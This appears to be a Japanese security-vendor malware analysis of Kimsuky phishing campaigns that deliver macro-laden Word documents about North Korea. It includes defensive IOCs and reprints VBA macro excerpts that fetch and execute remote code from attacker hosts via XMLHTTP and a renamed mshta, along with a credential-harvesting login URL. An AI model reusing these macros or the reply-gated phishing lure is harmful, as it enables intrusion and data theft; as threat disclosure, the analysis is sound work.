攻撃者のメールに返信した場合に外部リンクで提供される Word ドキュメント (Kimsuky)

ASEC 分析チームは、対北朝鮮に関する内容の不正な Word ドキュメントが継続的に拡散していることを確認した。確認された Word ドキュメントは AhnLab TIP に公開された「2021年 Kimsuky 攻撃ワード(word)ドキュメント事例総整理解析レポート」および「外交/安全保障関連の内容の Word ドキュメントが拡散中」において共有した Word ドキュメントのタイプと併せて、mshta を利用するタイプが確認された。

不正な Word ドキュメントは、以下のように様々なファイル名で配布されている。

  • キム** 履歴書(韓米**協会,220711).doc
  • ヤン**_**財団中間報告(220716).doc
  • 諮問要請書.doc
  • タイプ 1

諮問要請書.doc の不正な Word ドキュメントは、以下のメールを通じて配布されたものと推定される。攻撃者は、韓国国内の機関を詐称してレポートの作成に関する諮問を要請するための内容が含まれたメールを送信した。

1次攻撃の電子メール (添付ファイルなし)

メールに直接 Word ドキュメントを添付せず、ユーザーがそのメールに肯定的に返信した場合のみ、以下のように Word ドキュメントをダウンロードできる不正な URL を挿入して返信していることが確認された。

ユーザーが要請を拒否した場合の攻撃者の返信(リンク含まず)
ユーザーが要請を受諾した場合、2次攻撃の電子メールを受信 (Word ドキュメントリンク挿入)

上記メールに挿入されたリンクをクリックすると、以下のようにさらなる不正な URL が含まれたページが確認できる。

さらなる不正な URL への接続を誘導するページ

右下の「ダウンロード」をクリックすると hxxps://accounts.serviceprotect[.]eu/signin/v2/identifier?hl=kr&passive=true&<省略>rtnurl=aHR0cHM6Ly9kb2NzLmdv<省略>に接続する。現在この URL への接続は不可能だが、URL のアドレスから判断するとユーザーのログイン情報を収集したものと推定され、rtnurl パラメータ値のアドレスから、不正な Word ドキュメントをダウンロードしたものと見られる。

確認された Word ドキュメントを開くと、以下のようにマクロの実行を誘導するメッセージが、ハングルで作成された画像によって挿入されている。その後、ユーザーがコンテンツの有効化ボタンをクリックすると諮問要請に関連する内容が表示されるため、ユーザーが不正なファイルであることに気づきにくい。

マクロの実行を誘導する画像
マクロを有効化すると表示される本文内容

Word ドキュメントには VBA マクロが含まれており、特定の URL に接続する振る舞いを実行する。以下はマクロコードの一部である。

Sub Reserve(pth)
    Documents.Add
    cnt = "On Error Resume Next:Set mx = CreateObje" & "ct(""Microsoft.XMLHTTP""):mx.open ""GET"", ""hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"

Sub AutoOpen()
    On Error Resume Next
    pw = "1qaz2wsx"
    Weed pw

    obt = "winmgmts:win32_process" 
Set wm = GetObject(obt)
        pth = Templates(1).Path & "\version.ini"
        cd = "wscript.exe //e:vbscript //b"
wm.Create cd & pth

End Sub

マクロが実行されると AppData\Roaming\Microsoft\Templates フォルダーに version.ini ファイルを生成する。その後 wscript.exe を通じて生成した ini ファイルを実行する。

  • wscript.exe //e:vbscript //b %AppData%\Microsoft\Templates\version.ini
On Error Resume Next:Set mx = CreateObject(“Microsoft.XMLHTTP”):mx.open “GET”, “hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1”, False:mx.Send:Execute(mx.responseText)
version.ini

現在は URL に接続が不可能なため以降の振る舞いは確認できないが、以前に確認された「炭素排出専門企業をターゲットにした Word ドキュメントによる攻撃」と同じくユーザー PC の情報流出等の振る舞いが実行されたであろうと推定される。

  • タイプ 2

このタイプは特定のウェビナーの日程に関連する内容で配布されており、mshta を通じて C2 に接続する振る舞いを実行する。タイプ1と同様に Word ドキュメントを開くとマクロの実行を誘導する画像が挿入されており、ユーザーがコンテンツの有効化ボタンをクリックすると、以下のように対北朝鮮関連のトピックのウェビナー内容が表示される。

マクロを有効化すると表示される本文内容

確認された Word ドキュメントにも VBA マクロが含まれており、以下はドキュメントに含まれたマクロコードの一部である。

Sub AutoOpen()

jsfds = "cmd /c copy %windir%\system32\mshta.exe %tmp%\gtfmon.exe"
Shell jsfds, 0

jsfds = "cmd /c timeout /t 7 >NUL && %tmp%\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php"
Shell jsfds, 0

End Sub

マクロを実行すると mshta.exe を TEMP フォルダーに gtfmon.exe という名前でコピーしたあと、cmd コマンドを通じて特定の URL に接続を試みる。

  • cmd /c timeout /t 7 >NUL && %tmp%\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php

タイプ1と同様に、現在は上記 URL に接続が不可能であり、それ以降の振る舞いは確認できないが、ユーザー PC 情報の流出等の不正な振る舞いが行われたであろうと推定される。

対北朝鮮関連の内容を含む不正な Word ドキュメントが持続的に確認されているため、ユーザーの注意が必要である。特に、正常なユーザーを詐称して不正なドキュメントを配布する状況が確認されているため、メール送信者のアドレスを確認し、添付ファイルの閲覧および本文に含まれるリンクをクリックする際は注意しなければならない。

[ファイル検知]
Downloader/DOC.Kimsuky

[IOC]
357ef37979b02b08120895ae5175eb0a (doc)
7fe055d5aa72bd50470da61985e12a8a (doc)
hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1
hxxp://freunkown1.sportsontheweb[.]net/h.php

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

5 1 vote
評価する
Subscribe
Notify of
guest

1 コメント
Inline Feedbacks
View all comments